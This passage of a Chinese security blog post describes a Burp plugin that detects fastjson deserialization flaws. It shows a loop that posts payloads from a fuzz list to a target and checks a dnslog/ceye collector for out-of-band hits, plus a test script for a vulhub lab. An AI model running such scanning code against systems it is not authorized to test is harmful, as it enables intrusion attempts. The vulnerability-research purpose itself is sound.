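# The marker is loop-invariant, so compile it once instead of on every iteration.
pattern = re.compile('fastjson')
for payload in self.fuzzLFI.fastjson:
    # Send one candidate body. The HTTP reply itself is never inspected (detection is
    # out-of-band, below), so the response object is deliberately not kept.
    # NOTE: verify=False turns off TLS certificate validation for this request.
    try:
        requests.post(url, headers=heaers, timeout=5, data=payload, verify=False)
    except Exception as e:
        # Report a failed send instead of dropping it silently, but keep going: the
        # out-of-band check below may still register a hit from an earlier payload.
        print(e)
    # Out-of-band check: self.ceyeFin() returns the collector's records; a 'fastjson'
    # marker in them is treated as a hit for the current payload.
    response = self.ceyeFin()
    result = pattern.findall(response)
    if result:
        # The '[fastjson Body GET]' label is kept verbatim even though the request above
        # is a POST; downstream code may key on it.
        content = '[+]{} -> {} [Headers] -> {} [Bodys] -> {}'.format('[fastjson Body GET]', url, heaers,
                                                                     payload)
        print (content)
        self.save(content + ' ')
        print ('-' * 50)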
使用vulhub搭建一个漏洞环境
写个测试脚本
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import re
# All requests are routed through a proxy on the local machine (port 8080);
# presumably an intercepting proxy used to inspect the traffic — confirm.
proxies = dict(
    http="http://127.0.0.1:8080",
)
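def test(url="http://121.196.181.55:8090/"):
    """Send one GET to *url* through the module-level ``proxies`` and print the reply.

    The target address is a parameter (defaulting to the address the script was
    written with) so the same script can be pointed at another lab instance
    without editing the body.

    Args:
        url: Base URL to request.

    Returns:
        None. The raw response body is printed on success; on any exception only
        the exception message is printed.
    """
    headers = {
        "Content-Type":"application/json",
        "Accept": "*/*",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
    }
    try:
        # 15 s timeout keeps an unresponsive target from blocking the script indefinitely.
        res = requests.get(url, headers=headers, timeout=15, proxies=proxies)
        print(res.content)
    except Exception as e:
        # Best-effort script: the error is shown, not raised.
        print(e)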
if __name__ == "__main__":
    # Run the probe only when the file is executed directly, not when imported.
    test()
dnslog平台收到dnslog信息,就能判断是fastjson3那条payload触发了
dnslog.io也收到告警
代码地址:
https://github.com/dongfangyuxiao/BurpExtend/blob/master/Scan/scan_fin.py
结语:其实插件已经写了好久了,也已经更新了好几个版本了,最初的灵感来源于农夫的十八(公众号悦信安),今年元旦后开始正式用于挖SRC,也挖了好几家还不错的排名,所以想着把自己学习的知识分享给大家。原本计划打算是合成一个py脚本,后来因为时间原因也没能完成,目前在做一个甲方的自动化的渗透测试巡检平台,已经完成了脚本型的开发,图形化展示预估计今年年底可以面世,感兴趣的同学可以私聊我一起参与。
过程笔记可以参考
https://github.com/dongfangyuxiao/BurpExtend/tree/master/Burp插件学习笔记